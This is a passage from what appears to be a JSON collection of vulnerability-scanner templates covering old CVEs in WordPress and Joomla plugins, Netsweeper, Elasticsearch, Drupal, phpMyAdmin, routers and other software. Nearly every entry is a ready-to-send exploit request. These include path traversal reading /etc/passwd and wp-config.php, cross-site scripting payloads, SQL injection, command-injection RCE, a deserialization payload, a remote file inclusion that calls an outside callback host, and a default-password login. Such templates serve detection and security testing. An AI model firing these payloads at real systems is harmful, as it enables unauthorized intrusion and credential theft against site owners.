action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/swipehq-payment-gateway-woocommerce/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/dompdf.php?input_file=php://filter/resource=/etc/passwd","/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate Weather","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/import-legacy-media/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Video Gallery WordPress DZS"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-9180","info":{"name":"Eleanor CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/go.php?http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4577","info":{"name":"WP AmASIN \u2013 The Amazon Affiliate Shop - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5187","info":{"name":"Tom M8te (tom-m8te) Plugin 1.5.3 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/tom-m8te/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/shortcode-ninja/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5181","info":{"name":"Last.fm Rotation 1.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/lastfm-rotation/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4941","info":{"name":"Cross RSS 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/cross-rss/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ClickDesk Live Support - Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/alert-before-your-post/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Grand Flagallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Skysa App"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File 